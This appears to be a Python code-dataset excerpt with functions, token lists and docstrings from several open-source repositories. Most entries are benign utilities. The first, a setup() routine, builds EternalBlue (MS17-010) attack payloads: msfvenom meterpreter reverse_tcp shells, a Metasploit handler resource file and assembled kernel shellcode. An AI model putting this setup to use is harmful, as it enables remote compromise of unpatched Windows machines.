    self.combine_files('kshell64.bin', 'payload64.bin', 'final_met_64.bin')
    self.combine_files('kshell86.bin', 'payload32.bin', 'final_met_32.bin')
    self.create_payload('final_met_32.bin', 'final_met_64.bin', 'final_combined.bin')
    print_notification("Combining payloads done")
    print_success("Setup Done")
    return True
[ "def", "setup", "(", "self", ")", ":", "lport64", "=", "self", ".", "port64", "lport32", "=", "self", ".", "port32", "print_notification", "(", "\"Using ip: {}\"", ".", "format", "(", "self", ".", "ip", ")", ")", "print_notification", "(", "\"Generating metasploit resource file\"", ")", "resource", "=", "\"\"\"use exploit/multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset LHOST {ip}\nset LPORT {port64}\nset ExitOnSession false\nrun -j\nset payload windows/meterpreter/reverse_tcp\nset LHOST {ip}\nset LPORT {port32}\nset ExitOnSession false\nrun -j\n\"\"\"", ".", "format", "(", "ip", "=", "self", ".", "ip", ",", "port64", "=", "lport64", ",", "port32", "=", "lport32", ")", "self", ".", "resource_file", "=", "os", ".", "path", ".", "join", "(", "self", ".", "datadir", ",", "'ms17_resource.rc'", ")", "with", "open", "(", "self", ".", "resource_file", ",", "'w'", ")", "as", "f", ":", "f", ".", "write", "(", "resource", ")", "print_success", "(", "\"Resource file created, run the following command in msfconsole:\"", ")", "print_success", "(", "\"resource {}\"", ".", "format", "(", "self", ".", "resource_file", ")", ")", "command_64", "=", "\"msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload32.bin\"", ".", "format", "(", "ip", "=", "self", ".", "ip", ",", "port", "=", "lport32", ",", "datadir", "=", "self", ".", "datadir", ")", "command_32", "=", "\"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload64.bin\"", ".", "format", "(", "ip", "=", "self", ".", "ip", ",", "port", "=", "lport64", ",", "datadir", "=", "self", ".", "datadir", ")", "print_notification", "(", "\"Generating payloads\"", ")", "process", "=", "subprocess", ".", "run", "(", "command_32", ".", "split", "(", "' '", ")", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problem with generating payload:\"", ")", "print_error", "(", "process", ".", "stderr", ")", "return", "False", "process", "=", "subprocess", ".", "run", "(", "command_64", ".", "split", "(", "' '", ")", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problem with generating payload:\"", ")", "print_error", "(", "process", ".", "stderr", ")", "return", "False", "if", "not", "os", ".", "path", ".", "exists", "(", "os", ".", "path", ".", "join", "(", "self", ".", "datadir", ",", "'MS17-010'", ")", ")", ":", "print_notification", "(", "\"Git repo was not found, cloning\"", ")", "process", "=", "subprocess", ".", "run", "(", "\"git clone https://github.com/mwgielen/MS17-010 {dir}\"", ".", "format", "(", "dir", "=", "os", ".", "path", ".", "join", "(", "self", ".", "datadir", ",", "'MS17-010'", ")", ")", ".", "split", "(", "' '", ")", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problems with cloning git\"", ")", "return", "False", "process", "=", "subprocess", ".", "run", "(", "\"nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o {datadir}/kshell64.bin\"", ".", "format", "(", "datadir", "=", "self", ".", "datadir", ")", ".", "split", "(", "' '", ")", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problems with NASM\"", ")", "return", "False", "process", "=", "subprocess", ".", "run", "(", "\"nasm 
{datadir}/MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o {datadir}/kshell86.bin\"", ".", "format", "(", "datadir", "=", "self", ".", "datadir", ")", ".", "split", "(", "' '", ")", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problems with NASM\"", ")", "return", "False", "self", ".", "combine_files", "(", "'kshell64.bin'", ",", "'payload64.bin'", ",", "'final_met_64.bin'", ")", "self", ".", "combine_files", "(", "'kshell86.bin'", ",", "'payload32.bin'", ",", "'final_met_32.bin'", ")", "self", ".", "create_payload", "(", "'final_met_32.bin'", ",", "'final_met_64.bin'", ",", "'final_combined.bin'", ")", "print_notification", "(", "\"Combining payloads done\"", ")", "print_success", "(", "\"Setup Done\"", ")", "return", "True" ]
This function will call msfvenom, nasm and git via subprocess to set up all the things. Returns True if everything went well, otherwise returns False.
[ "This", "function", "will", "call", "msfvenom", "nasm", "and", "git", "via", "subprocess", "to", "setup", "all", "the", "things", ".", "Returns", "True", "if", "everything", "went", "well", "otherwise", "returns", "False", "." ]
python
valid
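The failure-handling pattern that setup() above repeats for msfvenom, git and nasm, reduced to a standalone sketch; the helper name and the command are illustrative, not from the source:

import subprocess

def run_step(command):
    # Run one external tool, capturing output so errors can be reported.
    process = subprocess.run(command.split(' '),
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if process.returncode != 0:
        print(process.stderr)   # surface the tool's stderr, as setup() does
        return False
    return True

# Each build step short-circuits the whole setup on failure.
if not run_step('git --version'):   # illustrative command
    raise SystemExit(1)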
MartinThoma/hwrt
hwrt/preprocess_dataset.py
https://github.com/MartinThoma/hwrt/blob/725c21a3d0f5a30b8492cbc184b3688ceb364e1c/hwrt/preprocess_dataset.py#L56-L92
def create_preprocessed_dataset(path_to_data, outputpath, preprocessing_queue): """Create a preprocessed dataset file by applying `preprocessing_queue` to `path_to_data`. The result will be stored in `outputpath`.""" # Log everything logging.info("Data soure %s", path_to_data) logging.info("Output will be stored in %s", outputpath) tmp = "Preprocessing Queue:\n" for preprocessing_class in preprocessing_queue: tmp += str(preprocessing_class) + "\n" logging.info(tmp) # Load from pickled file if not os.path.isfile(path_to_data): logging.info(("'%s' does not exist. Please either abort this script " "or update the data location."), path_to_data) raw_dataset_path = utils.choose_raw_dataset() # Get project-relative path raw_dataset_path = "raw-datasets" + \ raw_dataset_path.split("raw-datasets")[1] print(raw_dataset_path) sys.exit() # TODO: Update model! logging.info("Start loading data...") loaded = pickle.load(open(path_to_data, "rb")) raw_datasets = loaded['handwriting_datasets'] logging.info("Start applying preprocessing methods") start_time = time.time() for i, raw_dataset in enumerate(raw_datasets): if i % 10 == 0 and i > 0: utils.print_status(len(raw_datasets), i, start_time) # Do the work raw_dataset['handwriting'].preprocessing(preprocessing_queue) sys.stdout.write("\r%0.2f%% (done)\033[K\n" % (100)) print("") pickle.dump({'handwriting_datasets': raw_datasets, 'formula_id2latex': loaded['formula_id2latex'], 'preprocessing_queue': preprocessing_queue}, open(outputpath, "wb"), 2)
[ "def", "create_preprocessed_dataset", "(", "path_to_data", ",", "outputpath", ",", "preprocessing_queue", ")", ":", "# Log everything", "logging", ".", "info", "(", "\"Data soure %s\"", ",", "path_to_data", ")", "logging", ".", "info", "(", "\"Output will be stored in %s\"", ",", "outputpath", ")", "tmp", "=", "\"Preprocessing Queue:\\n\"", "for", "preprocessing_class", "in", "preprocessing_queue", ":", "tmp", "+=", "str", "(", "preprocessing_class", ")", "+", "\"\\n\"", "logging", ".", "info", "(", "tmp", ")", "# Load from pickled file", "if", "not", "os", ".", "path", ".", "isfile", "(", "path_to_data", ")", ":", "logging", ".", "info", "(", "(", "\"'%s' does not exist. Please either abort this script \"", "\"or update the data location.\"", ")", ",", "path_to_data", ")", "raw_dataset_path", "=", "utils", ".", "choose_raw_dataset", "(", ")", "# Get project-relative path", "raw_dataset_path", "=", "\"raw-datasets\"", "+", "raw_dataset_path", ".", "split", "(", "\"raw-datasets\"", ")", "[", "1", "]", "print", "(", "raw_dataset_path", ")", "sys", ".", "exit", "(", ")", "# TODO: Update model!", "logging", ".", "info", "(", "\"Start loading data...\"", ")", "loaded", "=", "pickle", ".", "load", "(", "open", "(", "path_to_data", ",", "\"rb\"", ")", ")", "raw_datasets", "=", "loaded", "[", "'handwriting_datasets'", "]", "logging", ".", "info", "(", "\"Start applying preprocessing methods\"", ")", "start_time", "=", "time", ".", "time", "(", ")", "for", "i", ",", "raw_dataset", "in", "enumerate", "(", "raw_datasets", ")", ":", "if", "i", "%", "10", "==", "0", "and", "i", ">", "0", ":", "utils", ".", "print_status", "(", "len", "(", "raw_datasets", ")", ",", "i", ",", "start_time", ")", "# Do the work", "raw_dataset", "[", "'handwriting'", "]", ".", "preprocessing", "(", "preprocessing_queue", ")", "sys", ".", "stdout", ".", "write", "(", "\"\\r%0.2f%% (done)\\033[K\\n\"", "%", "(", "100", ")", ")", "print", "(", "\"\"", ")", "pickle", ".", "dump", "(", "{", "'handwriting_datasets'", ":", "raw_datasets", ",", "'formula_id2latex'", ":", "loaded", "[", "'formula_id2latex'", "]", ",", "'preprocessing_queue'", ":", "preprocessing_queue", "}", ",", "open", "(", "outputpath", ",", "\"wb\"", ")", ",", "2", ")" ]
Create a preprocessed dataset file by applying `preprocessing_queue` to `path_to_data`. The result will be stored in `outputpath`.
[ "Create", "a", "preprocessed", "dataset", "file", "by", "applying", "preprocessing_queue", "to", "path_to_data", ".", "The", "result", "will", "be", "stored", "in", "outputpath", "." ]
python
train
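A hedged sketch of driving create_preprocessed_dataset above. The paths are illustrative, and `ScaleAndShift` is an assumed class name from hwrt's preprocessing module, not verified against this record:

from hwrt import preprocessing                      # assumed module layout
from hwrt.preprocess_dataset import create_preprocessed_dataset

queue = [preprocessing.ScaleAndShift()]             # applied in order to every recording
create_preprocessed_dataset(
    'raw-datasets/data.pickle',                     # pickled input (illustrative)
    'preprocessed/data.pickle',                     # output location (illustrative)
    queue,
)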
ladybug-tools/ladybug
ladybug/_datacollectionbase.py
https://github.com/ladybug-tools/ladybug/blob/c08b7308077a48d5612f644943f92d5b5dade583/ladybug/_datacollectionbase.py#L573-L581
def _check_values(self, values): """Check values whenever they come through the values setter.""" assert isinstance(values, Iterable) and not \ isinstance(values, (str, dict, bytes, bytearray)), \ 'values should be a list or tuple. Got {}'.format(type(values)) assert len(values) == len(self.datetimes), \ 'Length of values list must match length of datetimes list. {} != {}'.format( len(values), len(self.datetimes)) assert len(values) > 0, 'Data Collection must include at least one value'
[ "def", "_check_values", "(", "self", ",", "values", ")", ":", "assert", "isinstance", "(", "values", ",", "Iterable", ")", "and", "not", "isinstance", "(", "values", ",", "(", "str", ",", "dict", ",", "bytes", ",", "bytearray", ")", ")", ",", "'values should be a list or tuple. Got {}'", ".", "format", "(", "type", "(", "values", ")", ")", "assert", "len", "(", "values", ")", "==", "len", "(", "self", ".", "datetimes", ")", ",", "'Length of values list must match length of datetimes list. {} != {}'", ".", "format", "(", "len", "(", "values", ")", ",", "len", "(", "self", ".", "datetimes", ")", ")", "assert", "len", "(", "values", ")", ">", "0", ",", "'Data Collection must include at least one value'" ]
Check values whenever they come through the values setter.
[ "Check", "values", "whenever", "they", "come", "through", "the", "values", "setter", "." ]
python
train
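The same validation as _check_values above, as a self-contained sketch showing what passes and what is rejected:

from collections.abc import Iterable

def check_values(values, datetimes):
    # Strings are iterable but rejected explicitly, exactly as above.
    assert isinstance(values, Iterable) and not \
        isinstance(values, (str, dict, bytes, bytearray)), \
        'values should be a list or tuple. Got {}'.format(type(values))
    assert len(values) == len(datetimes), 'lengths must match'
    assert len(values) > 0, 'at least one value is required'

check_values([20.1, 20.5], ['2017-01-01 00:00', '2017-01-01 01:00'])  # passes
# check_values('20.1', [...]) would raise: a str is not an accepted container.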
BlueBrain/hpcbench
hpcbench/toolbox/process.py
https://github.com/BlueBrain/hpcbench/blob/192d0ec142b897157ec25f131d1ef28f84752592/hpcbench/toolbox/process.py#L57-L74
def physical_cpus(): """Get cpus identifiers, for instance set(["0", "1", "2", "3"]) :return Number of physical CPUs available :rtype: int """ if platform.system() == 'Darwin': ncores = subprocess.check_output( ['/usr/sbin/sysctl', '-n', 'hw.ncpu'], shell=False ) return int(ncores.strip()) sockets = set() with open('/proc/cpuinfo') as istr: for line in istr: if line.startswith('physical id'): sockets.add(line.split(':')[-1].strip()) return len(sockets)
[ "def", "physical_cpus", "(", ")", ":", "if", "platform", ".", "system", "(", ")", "==", "'Darwin'", ":", "ncores", "=", "subprocess", ".", "check_output", "(", "[", "'/usr/sbin/sysctl'", ",", "'-n'", ",", "'hw.ncpu'", "]", ",", "shell", "=", "False", ")", "return", "int", "(", "ncores", ".", "strip", "(", ")", ")", "sockets", "=", "set", "(", ")", "with", "open", "(", "'/proc/cpuinfo'", ")", "as", "istr", ":", "for", "line", "in", "istr", ":", "if", "line", ".", "startswith", "(", "'physical id'", ")", ":", "sockets", ".", "add", "(", "line", ".", "split", "(", "':'", ")", "[", "-", "1", "]", ".", "strip", "(", ")", ")", "return", "len", "(", "sockets", ")" ]
Count physical CPU sockets from their identifiers, for instance set(["0", "1", "2", "3"]) :return: Number of physical CPUs available :rtype: int
[ "Get", "cpus", "identifiers", "for", "instance", "set", "(", "[", "0", "1", "2", "3", "]", ")" ]
python
train
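The Linux branch of physical_cpus above counts distinct 'physical id' values; the same logic run over a canned /proc/cpuinfo snippet (the snippet is illustrative):

sample = """processor : 0
physical id : 0
processor : 1
physical id : 0
processor : 2
physical id : 1
"""
sockets = set()
for line in sample.splitlines():
    if line.startswith('physical id'):
        sockets.add(line.split(':')[-1].strip())
print(len(sockets))   # 2 -- two sockets despite three logical processors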
GPflow/GPflow
gpflow/core/node.py
https://github.com/GPflow/GPflow/blob/549394f0b1b0696c7b521a065e49bdae6e7acf27/gpflow/core/node.py#L86-L95
def clear(self): """ Calls `_clear` abstract method which must be implemented by descendants. :raises: GPflowError exception when parent of the node is built. """ parent = self.parent if parent is not self and parent.is_built_coherence(self.graph) is Build.YES: raise GPflowError('Clear method cannot be started. Upper nodes are built.') self._clear()
[ "def", "clear", "(", "self", ")", ":", "parent", "=", "self", ".", "parent", "if", "parent", "is", "not", "self", "and", "parent", ".", "is_built_coherence", "(", "self", ".", "graph", ")", "is", "Build", ".", "YES", ":", "raise", "GPflowError", "(", "'Clear method cannot be started. Upper nodes are built.'", ")", "self", ".", "_clear", "(", ")" ]
Calls `_clear` abstract method which must be implemented by descendants. :raises: GPflowError exception when parent of the node is built.
[ "Calls", "_clear", "abstract", "method", "which", "must", "be", "implemented", "by", "descendants", "." ]
python
train
ascribe/transactions
transactions/transactions.py
https://github.com/ascribe/transactions/blob/08f344ce1879152d2a0ba51dda76f11e73c83867/transactions/transactions.py#L68-L88
def get(self, hash, account="*", max_transactions=100, min_confirmations=6, raw=False): """ Args: hash: can be a bitcoin address or a transaction id. If it's a bitcoin address it will return a list of transactions up to ``max_transactions`` a list of unspents with confirmed transactions greater or equal to ``min_confirmantions`` account (Optional[str]): used when using the bitcoind. bitcoind does not provide an easy way to retrieve transactions for a single address. By using account we can retrieve transactions for addresses in a specific account Returns: transaction """ if len(hash) < 64: txs = self._service.list_transactions(hash, account=account, max_transactions=max_transactions) unspents = self._service.list_unspents(hash, min_confirmations=min_confirmations) return {'transactions': txs, 'unspents': unspents} else: return self._service.get_transaction(hash, raw=raw)
[ "def", "get", "(", "self", ",", "hash", ",", "account", "=", "\"*\"", ",", "max_transactions", "=", "100", ",", "min_confirmations", "=", "6", ",", "raw", "=", "False", ")", ":", "if", "len", "(", "hash", ")", "<", "64", ":", "txs", "=", "self", ".", "_service", ".", "list_transactions", "(", "hash", ",", "account", "=", "account", ",", "max_transactions", "=", "max_transactions", ")", "unspents", "=", "self", ".", "_service", ".", "list_unspents", "(", "hash", ",", "min_confirmations", "=", "min_confirmations", ")", "return", "{", "'transactions'", ":", "txs", ",", "'unspents'", ":", "unspents", "}", "else", ":", "return", "self", ".", "_service", ".", "get_transaction", "(", "hash", ",", "raw", "=", "raw", ")" ]
Args: hash: can be a bitcoin address or a transaction id. If it's a bitcoin address it will return a list of transactions up to ``max_transactions`` and a list of unspents with confirmations greater than or equal to ``min_confirmations`` account (Optional[str]): used when using the bitcoind. bitcoind does not provide an easy way to retrieve transactions for a single address. By using account we can retrieve transactions for addresses in a specific account Returns: transaction
[ "Args", ":", "hash", ":", "can", "be", "a", "bitcoin", "address", "or", "a", "transaction", "id", ".", "If", "it", "s", "a", "bitcoin", "address", "it", "will", "return", "a", "list", "of", "transactions", "up", "to", "max_transactions", "a", "list", "of", "unspents", "with", "confirmed", "transactions", "greater", "or", "equal", "to", "min_confirmantions", "account", "(", "Optional", "[", "str", "]", ")", ":", "used", "when", "using", "the", "bitcoind", ".", "bitcoind", "does", "not", "provide", "an", "easy", "way", "to", "retrieve", "transactions", "for", "a", "single", "address", ".", "By", "using", "account", "we", "can", "retrieve", "transactions", "for", "addresses", "in", "a", "specific", "account", "Returns", ":", "transaction" ]
python
train
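How get()'s length-based dispatch above behaves for a caller. `t` stands for an already-constructed transactions object exposing this method; its constructor is not shown in this record, and the values are illustrative:

address = 'mhyCaF2HFk7CVwKmyQ8TahgVdjnHSr1pTv'   # < 64 chars: address branch
result = t.get(address, min_confirmations=1)
history, unspents = result['transactions'], result['unspents']

txid = 'a' * 64                                   # 64 chars: single-transaction branch
tx = t.get(txid, raw=True)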
raiden-network/raiden
raiden/connection_manager.py
https://github.com/raiden-network/raiden/blob/407ba15c72074e9de88771d6b9661ff4dc36bef5/raiden/connection_manager.py#L208-L286
def join_channel(self, partner_address, partner_deposit): """Will be called, when we were selected as channel partner by another node. It will fund the channel with up to the partners deposit, but not more than remaining funds or the initial funding per channel. If the connection manager has no funds, this is a noop. """ # Consider this race condition: # # - Partner opens the channel and starts the deposit. # - This nodes learns about the new channel, starts ConnectionManager's # retry_connect, which will start a deposit for this half of the # channel. # - This node learns about the partner's deposit before its own. # join_channel is called which will try to deposit again. # # To fix this race, first the node must wait for the pending operations # to finish, because in them could be a deposit, and then deposit must # be called only if the channel is still not funded. token_network_proxy = self.raiden.chain.token_network(self.token_network_identifier) # Wait for any pending operation in the channel to complete, before # deciding on the deposit with self.lock, token_network_proxy.channel_operations_lock[partner_address]: channel_state = views.get_channelstate_for( views.state_from_raiden(self.raiden), self.token_network_identifier, self.token_address, partner_address, ) if not channel_state: return joining_funds = min( partner_deposit, self._funds_remaining, self._initial_funding_per_partner, ) if joining_funds <= 0 or self._leaving_state: return if joining_funds <= channel_state.our_state.contract_balance: return try: self.api.set_total_channel_deposit( self.registry_address, self.token_address, partner_address, joining_funds, ) except RaidenRecoverableError: log.info( 'Channel not in opened state', node=pex(self.raiden.address), ) except InvalidDBData: raise except RaidenUnrecoverableError as e: should_crash = ( self.raiden.config['environment_type'] != Environment.PRODUCTION or self.raiden.config['unrecoverable_error_should_crash'] ) if should_crash: raise log.critical( str(e), node=pex(self.raiden.address), ) else: log.info( 'Joined a channel', node=pex(self.raiden.address), partner=pex(partner_address), funds=joining_funds, )
[ "def", "join_channel", "(", "self", ",", "partner_address", ",", "partner_deposit", ")", ":", "# Consider this race condition:", "#", "# - Partner opens the channel and starts the deposit.", "# - This nodes learns about the new channel, starts ConnectionManager's", "# retry_connect, which will start a deposit for this half of the", "# channel.", "# - This node learns about the partner's deposit before its own.", "# join_channel is called which will try to deposit again.", "#", "# To fix this race, first the node must wait for the pending operations", "# to finish, because in them could be a deposit, and then deposit must", "# be called only if the channel is still not funded.", "token_network_proxy", "=", "self", ".", "raiden", ".", "chain", ".", "token_network", "(", "self", ".", "token_network_identifier", ")", "# Wait for any pending operation in the channel to complete, before", "# deciding on the deposit", "with", "self", ".", "lock", ",", "token_network_proxy", ".", "channel_operations_lock", "[", "partner_address", "]", ":", "channel_state", "=", "views", ".", "get_channelstate_for", "(", "views", ".", "state_from_raiden", "(", "self", ".", "raiden", ")", ",", "self", ".", "token_network_identifier", ",", "self", ".", "token_address", ",", "partner_address", ",", ")", "if", "not", "channel_state", ":", "return", "joining_funds", "=", "min", "(", "partner_deposit", ",", "self", ".", "_funds_remaining", ",", "self", ".", "_initial_funding_per_partner", ",", ")", "if", "joining_funds", "<=", "0", "or", "self", ".", "_leaving_state", ":", "return", "if", "joining_funds", "<=", "channel_state", ".", "our_state", ".", "contract_balance", ":", "return", "try", ":", "self", ".", "api", ".", "set_total_channel_deposit", "(", "self", ".", "registry_address", ",", "self", ".", "token_address", ",", "partner_address", ",", "joining_funds", ",", ")", "except", "RaidenRecoverableError", ":", "log", ".", "info", "(", "'Channel not in opened state'", ",", "node", "=", "pex", "(", "self", ".", "raiden", ".", "address", ")", ",", ")", "except", "InvalidDBData", ":", "raise", "except", "RaidenUnrecoverableError", "as", "e", ":", "should_crash", "=", "(", "self", ".", "raiden", ".", "config", "[", "'environment_type'", "]", "!=", "Environment", ".", "PRODUCTION", "or", "self", ".", "raiden", ".", "config", "[", "'unrecoverable_error_should_crash'", "]", ")", "if", "should_crash", ":", "raise", "log", ".", "critical", "(", "str", "(", "e", ")", ",", "node", "=", "pex", "(", "self", ".", "raiden", ".", "address", ")", ",", ")", "else", ":", "log", ".", "info", "(", "'Joined a channel'", ",", "node", "=", "pex", "(", "self", ".", "raiden", ".", "address", ")", ",", "partner", "=", "pex", "(", "partner_address", ")", ",", "funds", "=", "joining_funds", ",", ")" ]
Will be called when we were selected as channel partner by another node. It will fund the channel with up to the partner's deposit, but not more than the remaining funds or the initial funding per channel. If the connection manager has no funds, this is a noop.
[ "Will", "be", "called", "when", "we", "were", "selected", "as", "channel", "partner", "by", "another", "node", ".", "It", "will", "fund", "the", "channel", "with", "up", "to", "the", "partners", "deposit", "but", "not", "more", "than", "remaining", "funds", "or", "the", "initial", "funding", "per", "channel", "." ]
python
train
MisterY/asset-allocation
asset_allocation/cli.py
https://github.com/MisterY/asset-allocation/blob/72239aa20762cda67c091f27b86e65d61bf3b613/asset_allocation/cli.py#L30-L46
def show(format, full): """ Print current allocation to the console. """ # load asset allocation app = AppAggregate() app.logger = logger model = app.get_asset_allocation() if format == "ascii": formatter = AsciiFormatter() elif format == "html": formatter = HtmlFormatter() else: raise ValueError(f"Unknown formatter {format}") # formatters can display stock information with --full output = formatter.format(model, full=full) print(output)
[ "def", "show", "(", "format", ",", "full", ")", ":", "# load asset allocation", "app", "=", "AppAggregate", "(", ")", "app", ".", "logger", "=", "logger", "model", "=", "app", ".", "get_asset_allocation", "(", ")", "if", "format", "==", "\"ascii\"", ":", "formatter", "=", "AsciiFormatter", "(", ")", "elif", "format", "==", "\"html\"", ":", "formatter", "=", "HtmlFormatter", "else", ":", "raise", "ValueError", "(", "f\"Unknown formatter {format}\"", ")", "# formatters can display stock information with --full", "output", "=", "formatter", ".", "format", "(", "model", ",", "full", "=", "full", ")", "print", "(", "output", ")" ]
Print current allocation to the console.
[ "Print", "current", "allocation", "to", "the", "console", "." ]
python
train
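The select-a-formatter pattern used by show() above, reduced to a sketch with stand-in classes; both branches must return an instance so that .format() binds correctly:

class AsciiFormatter:                 # stand-in implementations
    def format(self, model, full=False):
        return str(model)

class HtmlFormatter:
    def format(self, model, full=False):
        return '<pre>{}</pre>'.format(model)

def pick_formatter(fmt):
    if fmt == 'ascii':
        return AsciiFormatter()
    elif fmt == 'html':
        return HtmlFormatter()
    raise ValueError('Unknown formatter {}'.format(fmt))

print(pick_formatter('html').format({'stocks': []}))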
brocade/pynos
pynos/versions/ver_7/ver_7_0_0/bgp.py
https://github.com/brocade/pynos/blob/bd8a34e98f322de3fc06750827d8bbc3a0c00380/pynos/versions/ver_7/ver_7_0_0/bgp.py#L677-L731
def peer_bfd_timers(self, **kwargs): """Configure BFD for BGP globally. Args: rbridge_id (str): Rbridge to configure. (1, 225, etc) peer_ip (str): Peer IPv4 address for BFD setting. tx (str): BFD transmit interval in milliseconds (300, 500, etc) rx (str): BFD receive interval in milliseconds (300, 500, etc) multiplier (str): BFD multiplier. (3, 7, 5, etc) delete (bool): True if BFD configuration should be deleted. Default value will be False if not specified. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `tx`, `rx`, or `multiplier` is not passed. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.bgp.neighbor(ip_addr='10.10.10.20', ... remote_as='65535', rbridge_id='230') ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', rbridge_id='230') ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', rbridge_id='230', ... get=True) ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', ... rbridge_id='230', delete=True) ... output = dev.bgp.neighbor(ip_addr='10.10.10.20', ... delete=True, rbridge_id='230', remote_as='65535') """ kwargs['min_tx'] = kwargs.pop('tx') kwargs['min_rx'] = kwargs.pop('rx') kwargs['router_bgp_neighbor_address'] = kwargs.pop('peer_ip') kwargs['delete'] = kwargs.pop('delete', False) callback = kwargs.pop('callback', self._callback) bfd_tx = self._peer_bfd_tx(**kwargs) bfd_rx = self._peer_bfd_rx(**kwargs) bfd_multiplier = self._peer_bfd_multiplier(**kwargs) if kwargs.pop('get', False): return self._peer_get_bfd(bfd_tx, bfd_rx, bfd_multiplier) config = pynos.utilities.merge_xml(bfd_tx, bfd_rx) config = pynos.utilities.merge_xml(config, bfd_multiplier) return callback(config)
[ "def", "peer_bfd_timers", "(", "self", ",", "*", "*", "kwargs", ")", ":", "kwargs", "[", "'min_tx'", "]", "=", "kwargs", ".", "pop", "(", "'tx'", ")", "kwargs", "[", "'min_rx'", "]", "=", "kwargs", ".", "pop", "(", "'rx'", ")", "kwargs", "[", "'router_bgp_neighbor_address'", "]", "=", "kwargs", ".", "pop", "(", "'peer_ip'", ")", "kwargs", "[", "'delete'", "]", "=", "kwargs", ".", "pop", "(", "'delete'", ",", "False", ")", "callback", "=", "kwargs", ".", "pop", "(", "'callback'", ",", "self", ".", "_callback", ")", "bfd_tx", "=", "self", ".", "_peer_bfd_tx", "(", "*", "*", "kwargs", ")", "bfd_rx", "=", "self", ".", "_peer_bfd_rx", "(", "*", "*", "kwargs", ")", "bfd_multiplier", "=", "self", ".", "_peer_bfd_multiplier", "(", "*", "*", "kwargs", ")", "if", "kwargs", ".", "pop", "(", "'get'", ",", "False", ")", ":", "return", "self", ".", "_peer_get_bfd", "(", "bfd_tx", ",", "bfd_rx", ",", "bfd_multiplier", ")", "config", "=", "pynos", ".", "utilities", ".", "merge_xml", "(", "bfd_tx", ",", "bfd_rx", ")", "config", "=", "pynos", ".", "utilities", ".", "merge_xml", "(", "config", ",", "bfd_multiplier", ")", "return", "callback", "(", "config", ")" ]
Configure BFD for BGP globally. Args: rbridge_id (str): Rbridge to configure. (1, 225, etc) peer_ip (str): Peer IPv4 address for BFD setting. tx (str): BFD transmit interval in milliseconds (300, 500, etc) rx (str): BFD receive interval in milliseconds (300, 500, etc) multiplier (str): BFD multiplier. (3, 7, 5, etc) delete (bool): True if BFD configuration should be deleted. Default value will be False if not specified. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `tx`, `rx`, or `multiplier` is not passed. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.bgp.neighbor(ip_addr='10.10.10.20', ... remote_as='65535', rbridge_id='230') ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', rbridge_id='230') ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', rbridge_id='230', ... get=True) ... output = dev.bgp.peer_bfd_timers(peer_ip='10.10.10.20', ... rx='300', tx='300', multiplier='3', ... rbridge_id='230', delete=True) ... output = dev.bgp.neighbor(ip_addr='10.10.10.20', ... delete=True, rbridge_id='230', remote_as='65535')
[ "Configure", "BFD", "for", "BGP", "globally", "." ]
python
train
pbrisk/businessdate
businessdate/businessdate.py
https://github.com/pbrisk/businessdate/blob/79a0c5a4e557cbacca82a430403b18413404a9bc/businessdate/businessdate.py#L616-L622
def adjust_follow(self, holidays_obj=None): """ adjusts to Business Day Convention "Following" (4.12(a) (i) 2006 ISDA Definitions). """ while not BusinessDate.is_business_day(self, holidays_obj): self = BusinessDate.add_days(self, 1) return self
[ "def", "adjust_follow", "(", "self", ",", "holidays_obj", "=", "None", ")", ":", "while", "not", "BusinessDate", ".", "is_business_day", "(", "self", ",", "holidays_obj", ")", ":", "self", "=", "BusinessDate", ".", "add_days", "(", "self", ",", "1", ")", "return", "self" ]
adjusts to Business Day Convention "Following" (4.12(a) (i) 2006 ISDA Definitions).
[ "adjusts", "to", "Business", "Day", "Convention", "Following", "(", "4", ".", "12", "(", "a", ")", "(", "i", ")", "2006", "ISDA", "Definitions", ")", "." ]
python
valid
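A worked example of the 'Following' convention implemented above, using only the standard library and a weekend-only business-day rule (the holiday calendar and dates are illustrative):

from datetime import date, timedelta

def adjust_follow(d, is_business_day=lambda d: d.weekday() < 5):
    while not is_business_day(d):     # roll forward until a business day
        d += timedelta(days=1)
    return d

print(adjust_follow(date(2016, 1, 2)))   # Saturday -> 2016-01-04 (Monday)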
mfcloud/python-zvm-sdk
zvmsdk/vmops.py
https://github.com/mfcloud/python-zvm-sdk/blob/de9994ceca764f5460ce51bd74237986341d8e3c/zvmsdk/vmops.py#L134-L138
def guest_reboot(self, userid): """Reboot a guest vm.""" LOG.info("Begin to reboot vm %s", userid) self._smtclient.guest_reboot(userid) LOG.info("Complete reboot vm %s", userid)
